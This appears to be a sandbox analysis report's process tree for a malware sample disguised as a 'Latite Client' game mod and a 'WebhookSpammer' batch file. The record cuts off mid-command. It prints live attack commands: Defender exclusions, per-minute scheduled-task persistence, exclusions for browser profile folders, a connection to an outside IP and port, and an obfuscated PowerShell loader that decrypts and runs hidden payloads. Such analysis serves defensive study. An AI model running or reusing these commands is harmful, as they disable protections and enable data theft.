        Scheduled Task/Job: Scheduled Task
        
        PID:1132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAZwBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AdgBlACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAcwBvAHIAcgB5ACAAZABvAHcAbgAgAGYAbwByACAAbgBvAHcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAagBzACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAZgBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAdABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAZQByACMAPgA="
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4804
        
        C:\Windows\Latite_Client_betterV1.exe
        
        "C:\Windows\Latite_Client_betterV1.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite_Client_betterV1.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Latite_Client_betterV1.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite_Client_betterV1.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1428
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite_Client_betterV1" /tr "C:\ProgramData\Latite_Client_betterV1.exe"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:1656
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAdABzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAbQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAZQByAHIAbwByACAAbgBvAHQAIAB3AG8AcgBrAGkAbgBnACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB6AHkAdAAjAD4A"
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4992
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAaQBsACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAeQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcwBmACMAPgA="
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe"
        8⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious use of SetWindowsHookEx
        
        PID:1296
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4776
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        10⤵
        
        PID:5076
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3204
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /rl highest /tn "Latite Client_BetterV3" /tr "C:\ProgramData\Latite Client_BetterV3.exe"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Latite Client_BetterV3.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4796
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\WindowsDefender'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsDefender'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4912
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsDefender" /tr "C:\ProgramData\WindowsDefender"
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4120
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.21 64197 7777 4BC88332F36C4890A41E
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4244
        
        C:\Windows\SysWOW64\explorer.exe
        
        "C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:3976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data"
        10⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:1672
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcd73946f8,0x7ffcd7394708,0x7ffcd7394718
        11⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4860
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2128 /prefetch:2
        11⤵
        
        PID:3540
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2292 /prefetch:3
        11⤵
        
        PID:2260
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=2596 /prefetch:8
        11⤵
        
        PID:3052
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
        11⤵
        
        PID:716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
        11⤵
        
        PID:1972
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1
        11⤵
        
        PID:4748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
        11⤵
        
        PID:376
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=4860 /prefetch:8
        11⤵
        
        PID:2088
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --mojo-platform-channel-handle=4860 /prefetch:8
        11⤵
        
        PID:2808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4672 /prefetch:1
        11⤵
        
        PID:4904
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5160 /prefetch:1
        11⤵
        
        PID:3108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --disable-3d-apis --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
        11⤵
        
        PID:4028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2140 /prefetch:2
        11⤵
        
        PID:2764
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2116 /prefetch:2
        11⤵
        
        PID:1604
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2384 /prefetch:2
        11⤵
        
        PID:2280
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2128 /prefetch:2
        11⤵
        
        PID:2724
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,3898477400520180179,12132830952950585586,131072 --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data" --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4460 /prefetch:2
        11⤵
        
        PID:2300
        
        C:\Windows\coolhi.exe
        
        "C:\Windows\coolhi.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5064
        
        C:\Windows\coolhi.exe
        
        "C:\Windows\coolhi.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'"
        9⤵
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:5076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'"
        9⤵
        
        PID:4516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        9⤵
        
        PID:1896
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2092
        
        C:\Windows\system32\net.exe
        
        net file
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3708
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        8⤵
        
        PID:3464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat';$wXwUA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WebhookSpammerV1.bat').Split([Environment]::NewLine);foreach ($wtvna in $wXwUA) { if ($wtvna.StartsWith(':: ')) { $cIlpE=$wtvna.Substring(3); break; }}$payloads_var=[string[]]$cIlpE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_670_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_670.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2692
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_670.vbs"
        8⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:1888
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_670.bat" "
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:4604
        
        C:\Windows\system32\net.exe
        
        net file
        10⤵
        Suspicious use of WriteProcessMemory
        
        PID:668
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        11⤵
        
        PID:2280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QnQ+LJ8uABbHbXAO4FuFVPGKynZ/3LF7hH8th9C5LeY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Giel7QVtc7MgczVdodu2Dw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $LluQH=New-Object System.IO.MemoryStream(,$param_var); $RYzDP=New-Object System.IO.MemoryStream; $FvOhk=New-Object System.IO.Compression.GZipStream($LluQH, [IO.Compression.CompressionMode]::Decompress); $FvOhk.CopyTo($RYzDP); $FvOhk.Dispose(); $LluQH.Dispose(); $RYzDP.Dispose(); $RYzDP.ToArray();}function execute_function($param_var,$param2_var){ $oYKjg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ccxBj=$oYKjg.EntryPoint; $ccxBj.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 